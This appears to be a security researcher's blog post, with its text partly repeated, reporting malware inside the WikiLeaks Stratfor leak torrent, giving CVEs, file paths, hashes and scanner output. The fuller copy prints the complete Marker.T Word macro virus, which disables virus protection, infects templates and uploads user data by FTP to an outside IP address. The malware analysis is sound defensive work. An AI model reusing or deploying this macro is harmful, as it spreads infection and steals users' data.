Click here for the second post on this topic, which includes more detailed technical information.
Hector Monsegur, formerly sabu of Lulzsec, has offered his point of view on this post. Get his opinion by reading my third post on the topic.
In my fourth post on this topic, I explain how malware is not limited to the Stratfor leak torrent - curated links throughout the Wikileaks.Org website allow users to download individual infected files.
This series of posts is beginning to receive coverage from several newspapers around the world. German speakers should check out the story in Neue Zürcher Zeitung / New Zurich Times. For English speakers, I recommend The Register from the UK for an excellent summary of these findings.
Beginning in February 27, 2012, the controversial news organization Wikileaks has been publishing a large and growing trove of emails from the private intelligence firm Strategic Forecasting, Inc (more widely known as Stratfor). The leak publication began with 200 emails, with Wikileaks progressively publishing more and more emails through the final publication date of July 18, 2014, at which time a single file containing over 5 million emails was published.
The source of the content was Jeremy Hammond, working in concert with Hector Xavier Monsegur as part of the group AntiSec. Hammond is currently in prison for the hack. Monsegur remains free; he was an FBI informant at the time of the hack and the release of the files. While the hack is attributed to Hammond, reliable sources are indicating that it was Monsegur who instigated the attack while he worked for the FBI. (NOTE: Hector X. Monsegnur has personally responded to this blog post and has denied this characterization of what happened. My only information on the history of the documents was obtained through media sources and court documents, which are often not reliable. I have not attempted to contact Jeremy Hammond. I only included this very brief foreward in an attempt to explain the history of the documents; which is still contested.)
It has been widely reported that Monsegur used an FBI-provided laptop and often worked full-time from an FBI office New York during the nine month period that the #antisec and #lulzsec released their widely distributed hacks, including the Stratfor job. To confuse matters further, court documents include reference to a third party, someone named Hyrriiya, who provided information critical to the Stratfor intrusion.
The content of the emails, though of obvious political and social significance, is not relevant to our post here. Newspapers around the world have spent a significant amount of time reporting on those leaks. However, no one appears to have noticed that a significant number of the files included in the leak contain malicious files that are designed to, among other things, retrieve detailed information about the computers which have downloaded them and send them to a variety of remote systems.
My research at this time is still in progress, however given the wide circulation of this data & the apparent lack of notification of the danger in these files has convinced me to publish what little I have found immediately.
I ought to be clear from the outset: I have no information linking Wikileaks, Asssange, Hammond, Monsegur, the FBI or anyone else directly with these malicious files. That very well may change quickly as research progresses, but at no point should this post be considered finger pointing. The purpose of this post is not to assign responsibility but to ensure that the journalists and activists downloading these files or who have already downloaded these files understand the consequences and take proper precautions. If I can encourage security researchers to take a look at these files it would be a bonus.
The files in question are not being distributed directly through the wikileaks.org domain, but through a secondary domain wlstorage.net. While the domains are separate, the wlstorage.net is linked directly from the Wikileak Global Intelligence Files web page (at https://wikileaks.org/gifiles), the two share the same SSL certificate as well as the same IP addresses. This would seem to (but doesn't entirely) rule out the notion that traffic is being diverted from Wikileaks to a fake server to fool users to download the malicious files.
The link to wlstorage.net points to a list of torrent files. As mentioned previously, Wikileaks began with a small initial leak of documents, and released progressively more documents. Each of these torrents is a different version of the leak, which over time grew to include more and more files as they were apparently reviewed by the Wikileaks team. Notice that the very last torrent uses a different compression method and file nomenclature than the rest of the torrents. It is this very last file, and this file only, that I have identified malware inside of.
The SSL Certificate for both domains is the same:
I have reviewed the last two file dumps listed in the wlstorage.net torrent list: gifiles-20121104151320.7z & gifiles-2014.tar.bz2. I was unable to identify any malware in 20121104151320.7z - which is notable for a number of reasons. Each of these files is massive - gifiles-20121104151320.7z is close to 3GB while compressed. However, gifiles-2014.tar.bz2 is 9x the size of gifiles-20121104151320.7z. The two files also use a different encryption scheme. 7zip is a Windows compression program, and 7zip was used to make every gifiles torrent dump except for gifiles-2014.tar.bz2 - which uses Tar and BZip, used commonly in Windows & Linux. Its reasonable to assume that gifiles-2014.tar.bz2 was created on a different computer than all of the other distributions.
I've identified the following exploits being used:
The software vulnerable to these exploits is (version omitted while research is in progress):
These exploits are contained in the following files:
These attachments are just phishing nonsense and dont contain malicious software but if you scan this dump with an antivirus they may cause a positive:
I have been working on extracting the payloads from the .DOC files first before moving on to the .PDFs and attempting to decompile the few executables. I have been able to confirm that the exploits and payloads in 117687_Lithium.doc, 117870_Hybrid write-up2.doc and 17793_Hybrid write-up.doc are identical. Here are the relevant signatures for the files:
117687_Lithium.doc
md5 6451dc0fc47122e75e3af66c9547d420
sha1 88eaf2aaa211d761c190d310d181f9f4e8d3853b
sha256 34b2bb5d9ac4abbf39d303dadabd3c6e45033643070bd3636ccab74b37d6f2d2
17793_Hybrid write-up.doc
md5 87114142e32fd455b525c900e4342475
sha1 cfda55de190f6b71434b4a4b66b2a372773133db
sha256 9bde32a6679339263d69a23da7b971ffb5c9882fbae9be311eeb28c49e817358
117870_Hybrid write-up2.doc
md5 6fde4a58f42deba3613030cbb93aef2b
sha1 07191e232304f3c7853e18916bb89f8af4cda3b1
sha256 32473591c2aa8bb96f9d48b224726f39480327606eb35641a2b4f2493af81655
Each of these three documents contains the following Visual Basic macro, a classic Marker.T that is well over 10 years old:
We shouldn't be convinced that this is the entire payload. The IP address included here has been recorded as a part of Marker.T since 2002. Just to be on the safe side, I tried it - there are no FTP connections being accepted at 209.201.88.110, which looks like it is assigned to a Vietnamese restaurant in New Jersey.
Using OfficeMalScanner provides further information:
There appears to be an additional payload in these files that is encrypted, in addition to the VBScript macro that sits on top. Uncovering it will take me a bit more time.
In addition to these three files I have also been working on a fourth file that makes use of a different set of exploits, 6566_TheSplitBetw.doc. Don't be fooled by the .DOC extension, this is an RTF file. 6566_TheSplitBetw.doc uses a classic RTF exploit: CVE-2010-3333.
md5 d93e2a5f8ac23824abc07f536aa4c50d
sha1 87584d1f761c3d8f34c4077da5aeadd4b1a470ca
sha256 e74fc919fba1cc8e9bc9680f026df8d4875c9f0f5864596445859ff916898b38
This exploit has been used in a number of attacks. In June 2011 a University of Louisville email server began sending out an email with an attachment claiming to be an "Insider's Guide to Military Benefits". The body of the email appeared to target Naval officers:
-----Original Message-----
From: CDR Courtney Bricks [mailto:cbricks@gmail.com]
Sent: Tuesday, May 31, 2011 11:23 PM
To: xxxxxx
Subject: Defense News article of interest
Sir,
Defense News article by Chris Cavas, from your interview last week is pasted below. Article appeared as a straight Q and A story, everything reads balanced and fair. Please let me know if you have any questions or concerns.
V/r,
Courtney
The U.S. Navy's major shipbuilding and aviation programs are largely setting into stability, but questions are rising about the strategic outlook for the Navy and Marine Corps and the forces they will need in the future, all in the context of a declining defense budget.
Navy Under Secretary Robert Work is in the center of the effort to define the Navy Department's direction and map out its future roles.
Then again in May of 2011 the same exploit was used as an attachment to an email titled "Courier who led U.S. to Osama bin Laden's hideout identified" which was sent to a significant number of US government email addresses.
Both times the payload was different. The exploit is a Metasploit module. It's been patched by Microsoft since 2010.
I've been working on reverse engineering this code as well. This file does not contain VBScript macros. The most interesting tidbit I have found apart from what is already well-documented about this exploit was recovered by scraping a bit of the shell code using this Python script (Javascript needs to be enabled to see the github embed, or you can view it here instead - the extraction script was provided by Alexander Hanel, though Mr Hanel did not collaborate on this project):
This is what was recovered (another github embed that can be viewed here for those who don't trust someone else's javascript):
I am still in the process of investigating this however I am particularly interested in the creation of an executable, C:\a.exe as well as a secondary RTF file, Tripolitania.RTF. Tripolitania, incidentally, was the name for the Libyan city of Tripoli in the early 20th century, when it was an Italian colony. These Stratfor guys do seem to have an interest in history (NOTE: Tripolitania.RTF appears to be the name of the first version of this document). I've recovered a little bit of the actual text of the attachment, and it looks like it was culled from a web page from Students for a Free Tibet:
"Lobby your government leaders to speak up for Tibet and protest Chinese leaders when they travel abroad. Take part in international days of action and commemorate historic dates within the Tibet movement."
At this point very little conclusions can be drawn from this information besides the obvious: those downloading this content from Wikileaks must use significant security measures to ensure the safety and reliability of their computing systems. Media organizations, including Wikileaks, are publishing email attachments like the ones I have identified as infected with malware here as part of their coverage of these document leaks. It is possible, for example, to search and download emails and attachments from the Wikileaks site. It does not take a wild imagination to figure that those initially reviewing these documents could take significant security precautions, while such precautions become less vital through the editing process until very few precautions are taken by the end user, who expect this content to be sanitized before it is provided to them by a media organization.
When downloading and viewing these files, most are attempting to protect themselves from surveillance; things like NSA's XKEYSCORE. Few users are expecting the leaked files themselves to be a threat. While there is overlap between the sort of security precautions that would protect a computer against outside surveillance and infected files, there are significant differences. For example, if air gapping can be an effective deterrent against surveillance and some of the worst features of malware. However, the threat from surveillance is often considered transitory. After performing the task which needs to be protected from prying eyes, a user might not find it unreasonable to break their airgap and reconnect to the internet after deleting their secret files. Alternatively, a user might rely on a USB stick to transfer applications or files from the air-gapped computer to a network-available computer. All such activity are easily exploited by malicious software. To use a somewhat related analogy - Tor won't protect you from a keylogger.
This is why notification of malicious software in these files is important: so users can adjust their operational security plans to adjust for it.
There are a number of theories that could account for the presence of this malicious software. Perhaps the least-wildeyed of those theories is that Statfor employees were receiving these malicious files through email. Whether or not those employees did anything with those malicious files, they could have been retrieved by Lulzsec, who in turn provided them to Wikileaks. The data is indeed massive, over 5.5 million emails. Perhaps so massive that ~ two years was not long enough to properly review and sanitize these files prior to their complete publication in 2014 (from the time they were received by WL sometime around 2012).
That is not the only explanation. The Snowden revelations have spelled out in plain detail how the same organizations that have been very invested in the destruction of Wikileaks could very well be capable of putting malicious software into a remote server, or to redirect a file transfer so that malicious software was transferred.
This post should not be construed as a warning to avoid paying close attention to media coverage of intelligence controversies because of the threat of malicious software. Quite the opposite, really. The information contained in these "Global Intelligence Files" are of critical social importance. People around the world should be able to inform themselves without putting themselves at undue risk.
The good news is this: the malware I have so far identified is old. So old that those using the latest versions of the software noted as vulnerable earlier are very likely safe even when executing these files. I scanned a number of these files using Virus Total, and a significant number of anti-virus applications were able to detect an issue with the files. The flipside of this positive spin is that at best only half of the popular antivirus applications I used to test these files (I tested using roughly 70 antivirus programs) detected malicious software. Some files were only detected by 15 antivirus programs.
One last note: I will almost certainly be updating this post and writing additional information about what I find as I continue my research. This is very much a "work in progress". I welcome all additional information, particularly information that conflicts with or adds to what I have found so far.
NOTE: my second post on this on this topic is online, and contains further malware analysis.
Hector Monsegur, formerly sabu of Lulzsec, contacted me. Our discussion is available on my third post.
Hector Monsegur, formerly sabu of Lulzsec, has offered his point of view on this post. Get his opinion by reading my third post on the topic.
In my fourth post on this topic, I explain how malware is not limited to the Stratfor leak torrent - curated links throughout the Wikileaks.Org website allow users to download individual infected files.
This series of posts is beginning to receive coverage from several newspapers around the world. German speakers should check out the story in Neue Zürcher Zeitung / New Zurich Times. For English speakers, I recommend The Register from the UK for an excellent summary of these findings.
Beginning in February 27, 2012, the controversial news organization Wikileaks has been publishing a large and growing trove of emails from the private intelligence firm Strategic Forecasting, Inc (more widely known as Stratfor). The leak publication began with 200 emails, with Wikileaks progressively publishing more and more emails through the final publication date of July 18, 2014, at which time a single file containing over 5 million emails was published.
The source of the content was Jeremy Hammond, working in concert with Hector Xavier Monsegur as part of the group AntiSec. Hammond is currently in prison for the hack. Monsegur remains free; he was an FBI informant at the time of the hack and the release of the files. While the hack is attributed to Hammond, reliable sources are indicating that it was Monsegur who instigated the attack while he worked for the FBI. (NOTE: Hector X. Monsegnur has personally responded to this blog post and has denied this characterization of what happened. My only information on the history of the documents was obtained through media sources and court documents, which are often not reliable. I have not attempted to contact Jeremy Hammond. I only included this very brief foreward in an attempt to explain the history of the documents; which is still contested.)
It has been widely reported that Monsegur used an FBI-provided laptop and often worked full-time from an FBI office New York during the nine month period that the #antisec and #lulzsec released their widely distributed hacks, including the Stratfor job. To confuse matters further, court documents include reference to a third party, someone named Hyrriiya, who provided information critical to the Stratfor intrusion.
The content of the emails, though of obvious political and social significance, is not relevant to our post here. Newspapers around the world have spent a significant amount of time reporting on those leaks. However, no one appears to have noticed that a significant number of the files included in the leak contain malicious files that are designed to, among other things, retrieve detailed information about the computers which have downloaded them and send them to a variety of remote systems.
My research at this time is still in progress, however given the wide circulation of this data & the apparent lack of notification of the danger in these files has convinced me to publish what little I have found immediately.
I ought to be clear from the outset: I have no information linking Wikileaks, Asssange, Hammond, Monsegur, the FBI or anyone else directly with these malicious files. That very well may change quickly as research progresses, but at no point should this post be considered finger pointing. The purpose of this post is not to assign responsibility but to ensure that the journalists and activists downloading these files or who have already downloaded these files understand the consequences and take proper precautions. If I can encourage security researchers to take a look at these files it would be a bonus.
The files in question are not being distributed directly through the wikileaks.org domain, but through a secondary domain wlstorage.net. While the domains are separate, the wlstorage.net is linked directly from the Wikileak Global Intelligence Files web page (at https://wikileaks.org/gifiles), the two share the same SSL certificate as well as the same IP addresses. This would seem to (but doesn't entirely) rule out the notion that traffic is being diverted from Wikileaks to a fake server to fool users to download the malicious files.
# host wikileaks.org wikileaks.org has address 195.35.109.53 wikileaks.org has address 91.218.114.210 wikileaks.org has address 91.218.244.152 wikileaks.org has address 95.211.113.131 wikileaks.org has address 95.211.113.154 wikileaks.org has address 195.35.109.44 wikileaks.org mail is handled by 1 mx.wikileaks.org. # host wlstorage.net wlstorage.net has address 91.218.114.210 wlstorage.net has address 91.218.244.152 wlstorage.net has address 95.211.113.131 wlstorage.net has address 95.211.113.154 wlstorage.net has address 195.35.109.44 wlstorage.net has address 195.35.109.53
The Wikileaks.Org Global Intelligence Files web page |
The link to wlstorage.net from Wikileaks |
The Global Intelligence Files torrent files on wlstorage.net |
issuer= /C=FR/O=GANDI SAS/CN=Gandi Standard SSL CA subject= /OU=Domain Control Validated/OU=Gandi Standard Wildcard SSL/CN=*.wikileaks.org notBefore=Oct 14 00:00:00 2013 GMT notAfter=Oct 14 23:59:59 2015 GMT 00b5f826 SHA1 Fingerprint=10:B3:D9:66:7F:BC:57:B5:C1:CF:98:5B:16:E3:EC:61:A4:C3:ED:32 # echo |\ > openssl s_client -connect wikileaks.org:443 2>&1 |\ > sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' -----BEGIN CERTIFICATE----- MIIE6DCCA9CgAwIBAgIQKAc9xHmKh6q3z95GsMA9IjANBgkqhkiG9w0BAQUFADBB MQswCQYDVQQGEwJGUjESMBAGA1UEChMJR0FOREkgU0FTMR4wHAYDVQQDExVHYW5k aSBTdGFuZGFyZCBTU0wgQ0EwHhcNMTMxMDE0MDAwMDAwWhcNMTUxMDE0MjM1OTU5 WjBjMSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxJDAiBgNVBAsT G0dhbmRpIFN0YW5kYXJkIFdpbGRjYXJkIFNTTDEYMBYGA1UEAxQPKi53aWtpbGVh a3Mub3JnMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwpQwc3GxL/BS gnQyIoYth18lqHwl70IYbPrM1rJnQ/kgnTOBE2ztEI8DGWAxoxZaeV7XckCTproL u6lVFQlNQWW8FxhqFwSpC6NkVUoYDcSKnxwrj9UUy15BpGwmMCUOcnIe0U1YUfGo hzJAzoqWEmXvaYnC8iIrv2Yd+jT511/Q38hjcQWJUOxQl8XNPbuQmD1WHYhH252j tEiTo9W72fhQa9Gdzxy2J4223n3iK4vQZx+RSwBF7JpbhUpCWXKqOnf6oboDtwsS TDzVpdiaMUh2PhdqJR0E+dkX3h0WT1ShLiKkb3zc0D3pRoCFRLEZXMQeDCM0aLco NHxIe4lGQwIDAQABo4IBuDCCAbQwHwYDVR0jBBgwFoAUtqj/oqgv0KbNS7Fo8+dQ EDGneSEwHQYDVR0OBBYEFGs9iHIkjSj3V1CgThX0Fs+sNogDMA4GA1UdDwEB/wQE AwIFoDAMBgNVHRMBAf8EAjAAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD AjBgBgNVHSAEWTBXMEsGCysGAQQBsjEBAgIaMDwwOgYIKwYBBQUHAgEWLmh0dHA6 Ly93d3cuZ2FuZGkubmV0L2NvbnRyYWN0cy9mci9zc2wvY3BzL3BkZi8wCAYGZ4EM AQIBMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuZ2FuZGkubmV0L0dhbmRp U3RhbmRhcmRTU0xDQS5jcmwwagYIKwYBBQUHAQEEXjBcMDcGCCsGAQUFBzAChito dHRwOi8vY3J0LmdhbmRpLm5ldC9HYW5kaVN0YW5kYXJkU1NMQ0EuY3J0MCEGCCsG AQUFBzABhhVodHRwOi8vb2NzcC5nYW5kaS5uZXQwKQYDVR0RBCIwIIIPKi53aWtp bGVha3Mub3Jngg13aWtpbGVha3Mub3JnMA0GCSqGSIb3DQEBBQUAA4IBAQAXlibh e0R/kZ6eBGahIhYiy4fAWylbB4/G+k9OKFuz55e43aw5ADB2BGQtY3FSzghL4chn uYBZNBHxsOeDnOisu1hxDxSLjG5oofJFzmNryOxrI2f9aC0sbGAauxM5+Wsj6kw9 ghylh6Tp6Q5X01jXlD91LD5M74NwUDrTd0Sdl1rB7A8LjEvdVTnlmzxAJDK7VQHX fa+RXiPBqCgTaRTgBh6s7BRssMAX0P80cdTu8EkiNUODh6hmXnqKhuHLcdu9CELc tz3okx9jRNmFP1Wp0Z7WupYUNcdMPSWEMLBjm6vYT54jFtIVeNK0sChmWxiADFBr ElIzcmpt7JexUF8K -----END CERTIFICATE----- echo |\ > openssl s_client -connect wlstorage.net:443 2>&1 |\ > sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' -----BEGIN CERTIFICATE----- MIIE6DCCA9CgAwIBAgIQKAc9xHmKh6q3z95GsMA9IjANBgkqhkiG9w0BAQUFADBB MQswCQYDVQQGEwJGUjESMBAGA1UEChMJR0FOREkgU0FTMR4wHAYDVQQDExVHYW5k aSBTdGFuZGFyZCBTU0wgQ0EwHhcNMTMxMDE0MDAwMDAwWhcNMTUxMDE0MjM1OTU5 WjBjMSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxJDAiBgNVBAsT G0dhbmRpIFN0YW5kYXJkIFdpbGRjYXJkIFNTTDEYMBYGA1UEAxQPKi53aWtpbGVh a3Mub3JnMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwpQwc3GxL/BS gnQyIoYth18lqHwl70IYbPrM1rJnQ/kgnTOBE2ztEI8DGWAxoxZaeV7XckCTproL u6lVFQlNQWW8FxhqFwSpC6NkVUoYDcSKnxwrj9UUy15BpGwmMCUOcnIe0U1YUfGo hzJAzoqWEmXvaYnC8iIrv2Yd+jT511/Q38hjcQWJUOxQl8XNPbuQmD1WHYhH252j tEiTo9W72fhQa9Gdzxy2J4223n3iK4vQZx+RSwBF7JpbhUpCWXKqOnf6oboDtwsS TDzVpdiaMUh2PhdqJR0E+dkX3h0WT1ShLiKkb3zc0D3pRoCFRLEZXMQeDCM0aLco NHxIe4lGQwIDAQABo4IBuDCCAbQwHwYDVR0jBBgwFoAUtqj/oqgv0KbNS7Fo8+dQ EDGneSEwHQYDVR0OBBYEFGs9iHIkjSj3V1CgThX0Fs+sNogDMA4GA1UdDwEB/wQE AwIFoDAMBgNVHRMBAf8EAjAAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD AjBgBgNVHSAEWTBXMEsGCysGAQQBsjEBAgIaMDwwOgYIKwYBBQUHAgEWLmh0dHA6 Ly93d3cuZ2FuZGkubmV0L2NvbnRyYWN0cy9mci9zc2wvY3BzL3BkZi8wCAYGZ4EM AQIBMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuZ2FuZGkubmV0L0dhbmRp U3RhbmRhcmRTU0xDQS5jcmwwagYIKwYBBQUHAQEEXjBcMDcGCCsGAQUFBzAChito dHRwOi8vY3J0LmdhbmRpLm5ldC9HYW5kaVN0YW5kYXJkU1NMQ0EuY3J0MCEGCCsG AQUFBzABhhVodHRwOi8vb2NzcC5nYW5kaS5uZXQwKQYDVR0RBCIwIIIPKi53aWtp bGVha3Mub3Jngg13aWtpbGVha3Mub3JnMA0GCSqGSIb3DQEBBQUAA4IBAQAXlibh e0R/kZ6eBGahIhYiy4fAWylbB4/G+k9OKFuz55e43aw5ADB2BGQtY3FSzghL4chn uYBZNBHxsOeDnOisu1hxDxSLjG5oofJFzmNryOxrI2f9aC0sbGAauxM5+Wsj6kw9 ghylh6Tp6Q5X01jXlD91LD5M74NwUDrTd0Sdl1rB7A8LjEvdVTnlmzxAJDK7VQHX fa+RXiPBqCgTaRTgBh6s7BRssMAX0P80cdTu8EkiNUODh6hmXnqKhuHLcdu9CELc tz3okx9jRNmFP1Wp0Z7WupYUNcdMPSWEMLBjm6vYT54jFtIVeNK0sChmWxiADFBr ElIzcmpt7JexUF8K -----END CERTIFICATE-----
I have reviewed the last two file dumps listed in the wlstorage.net torrent list: gifiles-20121104151320.7z & gifiles-2014.tar.bz2. I was unable to identify any malware in 20121104151320.7z - which is notable for a number of reasons. Each of these files is massive - gifiles-20121104151320.7z is close to 3GB while compressed. However, gifiles-2014.tar.bz2 is 9x the size of gifiles-20121104151320.7z. The two files also use a different encryption scheme. 7zip is a Windows compression program, and 7zip was used to make every gifiles torrent dump except for gifiles-2014.tar.bz2 - which uses Tar and BZip, used commonly in Windows & Linux. Its reasonable to assume that gifiles-2014.tar.bz2 was created on a different computer than all of the other distributions.
I've identified the following exploits being used:
MARKER.T CVE-2006-2492 CVE-2009-0557 CVE-2011-0611 CVE-2010-3333 HEAPSPRAY Mydoom Magistr Pdfjsc.BP Wordjmp.gen Mimail
The software vulnerable to these exploits is (version omitted while research is in progress):
Adobe Acrobat Adobe Flash Player ActiveX Microsoft Office Microsoft Office for Mac Open XML File Format Converter
These exploits are contained in the following files:
gifiles-2014\gifiles\attach\6\6566_The Split Betw.doc gifiles-2014\gifiles\attach\19\19701_MASY - Q MASY HUMINT.doc gifiles-2014\gifiles\attach\19\19719_List of Addresses - Advance Copies.doc gifiles-2014\gifiles\attach\152\152977_Happy vacation.pdf gifiles-2014\gifiles\attach\18\18714_Research_and_R.xls gifiles-2014\gifiles\attach\117\117687_Lithium.doc gifiles-2014\gifiles\attach\117\117870_Hybrid write-up2.doc gifiles-2014\gifiles\attach\117\117793_Hybrid write-up.doc gifiles-2014\gifiles\attach\47\47247_US Congress re.doc gifiles-2014\gifiles\attach\47\47329_US Congress re.doc gifiles-2014\gifiles\attach\52\52004_IRAN_STRAIT_PART.pdf gifiles-2014\gifiles\attach\151\151784_Command.com gifiles-2014\gifiles\attach\151\151098_text.zip->(Zip) gifiles-2014\gifiles\attach\151\151098_text.zip->text.exe gifiles-2014\gifiles\attach\119\119443_Russia Data Requests.doc gifiles-2014\gifiles\attach\142\142345_photos.zip->(Zip) gifiles-2014\gifiles\attach\142\142345_photos.zip->photos.jpg.exe gifiles-2014\gifiles\attach\146\146924_message.zip->(Zip) gifiles-2014\gifiles\attach\146\146924_message.zip->message.exe gifiles-2014\gifiles\attach\17\17102_Draft scenarios for Libya_0416.pdf
These attachments are just phishing nonsense and dont contain malicious software but if you scan this dump with an antivirus they may cause a positive:
gifiles-2014\gifiles\docs\34\3485657_your-friend-cj-saw-miniture-tesla-generator-in-action-live.html gifiles-2014\gifiles\attach\20\20497_PP-001-460-891-520.html
I have been working on extracting the payloads from the .DOC files first before moving on to the .PDFs and attempting to decompile the few executables. I have been able to confirm that the exploits and payloads in 117687_Lithium.doc, 117870_Hybrid write-up2.doc and 17793_Hybrid write-up.doc are identical. Here are the relevant signatures for the files:
117687_Lithium.doc
md5 6451dc0fc47122e75e3af66c9547d420
sha1 88eaf2aaa211d761c190d310d181f9f4e8d3853b
sha256 34b2bb5d9ac4abbf39d303dadabd3c6e45033643070bd3636ccab74b37d6f2d2
17793_Hybrid write-up.doc
md5 87114142e32fd455b525c900e4342475
sha1 cfda55de190f6b71434b4a4b66b2a372773133db
sha256 9bde32a6679339263d69a23da7b971ffb5c9882fbae9be311eeb28c49e817358
117870_Hybrid write-up2.doc
md5 6fde4a58f42deba3613030cbb93aef2b
sha1 07191e232304f3c7853e18916bb89f8af4cda3b1
sha256 32473591c2aa8bb96f9d48b224726f39480327606eb35641a2b4f2493af81655
Each of these three documents contains the following Visual Basic macro, a classic Marker.T that is well over 10 years old:
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Close() On Error Resume Next Const Marker = "<- this is a marker!" 'Declare Variables Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean Dim ad, nt As Object Dim OurCode, UserAddress, LogData, LogFile As String 'Initialize Variables Set ad = ActiveDocument.VBProject.VBComponents.Item(1) Set nt = NormalTemplate.VBProject.VBComponents.Item(1) DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000) NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000) 'Switch the VirusProtection OFF Options.VirusProtection = False If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then If DocumentInfected = True Then LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines) ElseIf NormalTemplateInfected = True Then LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines) End If LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->")) For i = 1 To 4 LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1) Next i LogFile = "C:\hsf" & LogFile & ".sys" Open LogFile For Output As #1 Print #1, LogData Close #1 Open "c:\netldx.vxd" For Output As #1 Print #1, "o 209.201.88.110" Print #1, "user anonymous" Print #1, "pass itsme@" Print #1, "cd incoming" Print #1, "ascii" Print #1, "put " & LogFile Print #1, "quit" Close #1 Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True End If 'Make sure that some conditions are true before we continue infecting anything If (DocumentInfected = True Xor NormalTemplateInfected = True) And _ (ActiveDocument.SaveFormat = wdFormatDocument Or _ ActiveDocument.SaveFormat = wdFormatTemplate) Then 'Infect the NormalTemplate If DocumentInfected = True Then SaveNormalTemplate = NormalTemplate.Saved OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines) 'Write a log file of this NormalTemplate infection For i = 1 To Len(Application.UserAddress) If Mid(Application.UserAddress, i, 1) <> Chr(13) Then If Mid(Application.UserAddress, i, 1) <> Chr(10) Then UserAddress = UserAddress & Mid(Application.UserAddress, i, 1) End If Else UserAddress = UserAddress & Chr(13) & "' " End If Next i OurCode = OurCode & Chr(13) & _ "' " & Format(Time, "hh:mm:ss AMPM - ") & _ Format(Date, "dddd, d mmm yyyy") & Chr(13) & _ "' " & Application.UserName & Chr(13) & _ "' " & UserAddress & Chr(13) nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines nt.CodeModule.AddFromString OurCode If SaveNormalTemplate = True Then NormalTemplate.Save End If 'Infect the ActiveDocument If NormalTemplateInfected = True And _ (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _ ActiveDocument.Saved = False) Then SaveDocument = ActiveDocument.Saved OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines) ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines ad.CodeModule.AddFromString OurCode If SaveDocument = True Then ActiveDocument.Save End If End If End Sub
We shouldn't be convinced that this is the entire payload. The IP address included here has been recorded as a part of Marker.T since 2002. Just to be on the safe side, I tried it - there are no FTP connections being accepted at 209.201.88.110, which looks like it is assigned to a Vietnamese restaurant in New Jersey.
Using OfficeMalScanner provides further information:
[*] SCAN mode selected
[*] Opening file 117870_Hybrid write-up2.doc
[*] Filesize is 604672 (0x93a00) Bytes
[*] Ms Office OLE2 Compound Format document detected
[*] Scanning now...
+++++ decryption loop detected at offset: 0x00019eb8 +++++ 33C9 xor ecx, ecx E7EE out EEh, eax 2974E835 sub [eax+ebp*8+35h], esi 79F7 jns $-07h 34A2 xor al, A2h 12F5 adc dh, ch 72F7 jb $-07h 94 xchg esp, eax BA0EE6EEA9 mov edx, A9EEE60Eh 7909 jns $+0Bh E615 out 15h, al 774F jnbe $+51h 51 push ecx B42F mov ah, 2Fh EE out dx, al 9E sahf
-------------------------------------------------------------------------- Brute-forcing for encrypted PE- and embedded OLE-files now... Bruting XOR Key: 0x01
....
Analysis finished! ------------------------------------------------------------------------ 117870_Hybrid write-up2.doc seems to be malicious! Malicious Index = 10 ------------------------------------------------------------------------
There appears to be an additional payload in these files that is encrypted, in addition to the VBScript macro that sits on top. Uncovering it will take me a bit more time.
In addition to these three files I have also been working on a fourth file that makes use of a different set of exploits, 6566_TheSplitBetw.doc. Don't be fooled by the .DOC extension, this is an RTF file. 6566_TheSplitBetw.doc uses a classic RTF exploit: CVE-2010-3333.
md5 d93e2a5f8ac23824abc07f536aa4c50d
sha1 87584d1f761c3d8f34c4077da5aeadd4b1a470ca
sha256 e74fc919fba1cc8e9bc9680f026df8d4875c9f0f5864596445859ff916898b38
This exploit has been used in a number of attacks. In June 2011 a University of Louisville email server began sending out an email with an attachment claiming to be an "Insider's Guide to Military Benefits". The body of the email appeared to target Naval officers:
-----Original Message-----
From: CDR Courtney Bricks [mailto:cbricks@gmail.com]
Sent: Tuesday, May 31, 2011 11:23 PM
To: xxxxxx
Subject: Defense News article of interest
Sir,
Defense News article by Chris Cavas, from your interview last week is pasted below. Article appeared as a straight Q and A story, everything reads balanced and fair. Please let me know if you have any questions or concerns.
V/r,
Courtney
The U.S. Navy's major shipbuilding and aviation programs are largely setting into stability, but questions are rising about the strategic outlook for the Navy and Marine Corps and the forces they will need in the future, all in the context of a declining defense budget.
Navy Under Secretary Robert Work is in the center of the effort to define the Navy Department's direction and map out its future roles.
Then again in May of 2011 the same exploit was used as an attachment to an email titled "Courier who led U.S. to Osama bin Laden's hideout identified" which was sent to a significant number of US government email addresses.
Both times the payload was different. The exploit is a Metasploit module. It's been patched by Microsoft since 2010.
